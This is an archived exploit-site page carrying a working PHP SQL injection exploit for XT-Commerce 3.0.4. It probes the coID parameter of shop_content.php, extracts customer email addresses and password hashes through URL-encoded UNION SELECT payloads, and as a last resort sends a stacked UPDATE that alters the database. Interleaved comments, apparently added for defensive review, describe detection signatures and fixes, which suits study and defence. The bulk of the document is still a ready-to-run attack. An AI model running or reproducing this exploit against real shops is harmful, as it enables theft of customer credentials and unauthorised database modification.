XT-Commerce Version 3.0.4 SQL Injection Exploit
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>XT-Commerce Version 3.0.4 SQL Injection Exploit</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>===============================================
XT-Commerce Version 3.0.4 SQL Injection Exploit
===============================================
<?php
# Exploit Title: XT-Commerce
# Date: 25/7/2010
# Author: TA4G – S8T@hotmail.com
# Software Link: http://www.xt-commerce.info/index.php?_m=downloads&_a=viewdownload&downloaditemid=19
# Version: 3.0.4
# Google dork : n/a
# Platform / Tested on: Ubuntu Linux
# Category: webapps/0day
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
L0v3 To: TA4G _ lOsT _ Mr-DraGon _ Kader11000 _ illusionist2512 _ TnTDc _ P4L-T3RRORIST
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### ArHack.NeT ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Reviewer summary (defensive reading of this proof-of-concept):
# A command-line PHP script; $argv[1] is the shop's base URL and every request
# is a plain GET made with file_get_contents(). The script relies on exactly
# two signals in the HTTP response body: the MySQL error text
# "You have an error in your SQL syntax" and whatever the page puts between
# <title> and </title>. Fixing the application therefore needs both parts:
# bind/cast the coID path segment before it reaches the query, and stop
# verbose database errors from being reflected into the page.
# Detection: access-log entries for shop_content.php/coID/ whose value begins
# with a quoted -1 and carries URL-encoded SQL keywords (union, select,
# concat, UPDATE); the script issues up to three such requests in a row.
// Step 1 - vulnerability probe: a lone quote is appended to coID and the site
// is called "exploitable" only if the database error string is reflected.
// A site returning a generic error page is reported as not exploitable here
// even when the underlying injection still exists.
$check_vuln = file_get_contents($argv[1]."shop_content.php/coID/-1′");
if(strpos($check_vuln,"You have an error in your SQL syntax") != false)
{
print("Site is exploitable.nn");
}
else
{
// No error reflected: fetch the front page and look for the "xt:Commerce"
// string purely to tell the operator whether the target runs this software.
$getCont = file_get_contents($argv[1]);
if(strpos($getCont,"xt:Commerce") == false)//Check if xt:commerce software
{
print("Copyright of software not found.n");
print("Site is not exploitable.nn");
exit(0);
}
else
{
print("Site is not exploitable.nn");
print("Exploiting stopped.nn");
exit(0);
}
}
// Step 2 - read attempt: a UNION SELECT pulls customers_email_address and
// customers_password (joined with ";") from the customers table. This is the
// data at risk; customer credentials in that table should be treated as
// exposed on any host where this request returned a title containing ";".
$innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat%
28customers_email_address%2C0×3b%2Ccustomers_password%2C0×3b%29%20from%20customers%20limit%
200%2C1%20union%20select%201%20from%20content_manager%20where%20content_group%20%3D%20%
271");
// Step 3 - if the first shape produced a SQL error, a near-identical variant
// of the same statement is sent (it differs only in the LIMIT clause).
if(strpos($innerHTML,"You have an error in your SQL syntax") != false)
{
$innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat%
28customers_email_address%2C0×3b%2Ccustomers_password%2C0×3b%29%20from%20customers%20limit%
20200%2C1%20union%20select%201%20from%20content_manager%20where%20content_group%20%3D%
20%271");
}
// Step 4 - last resort appends a stacked statement ("; UPDATE content_manager
// SET languages_id = '2' ..."). Unlike the previous two this one WRITES to the
// database, so after a matching log entry also verify the integrity of
// content_manager.languages_id, not only whether customer data was read.
if(strpos($innerHTML,"You have an error in your SQL syntax") != false)
{
$innerHTML = file_get_contents($argv[1]."shop_content.php/coID/-1%27%20union%20select%20concat%
28customers_email_address%2C0×3b%2Ccustomers_password%2C0×3b%29%20from%20customers%20limit%
200%2C1%3B–%20UPDATE%20content_manager%20SET%20languages_id%20%3D%20%272%27%
20where%205%3D%271");
}
//split of return
// The leaked row is parsed out of the page <title>: the vulnerable query's
// result is rendered as the content title, so anything the query returns is
// visible to an unauthenticated client without any further interaction.
$innerTitle = substr($innerHTML,strpos($innerHTML,"<title>")+7,(strpos($innerHTML,"</title>")-(strpos
($innerHTML,"<title>")+7)));
if(strpos($innerTitle,";") != false)
{
// Field 1 (up to the first ";") is reported as the username, field 2 (up to
// the next ";") as the password hash; a 32-character value is reported as
// MD5. Unsalted MD5 storage is a finding in itself - stored credentials
// should use a slow, salted password hash so a leaked row is not reusable.
$innerUser = substr($innerTitle,0,strpos($innerTitle,";"));
$innerMD5 = substr($innerTitle,strpos($innerTitle,";")+1,strlen($innerTitle));
$innerMD5 = substr($innerMD5,0,strpos($innerMD5,";"));
print("Username:n");
print($innerUser."n");
if(strlen($innerMD5)==32)
{
print("Hash is MD5:n");
print($innerMD5."n");
}
else
{
print("Is not MD5:n");
print($innerMD5."n");
}
}
else
{
// No ";" in the title: none of the three requests produced readable output.
print("Error, stop executing.nn");
}
?>
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-26]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13476
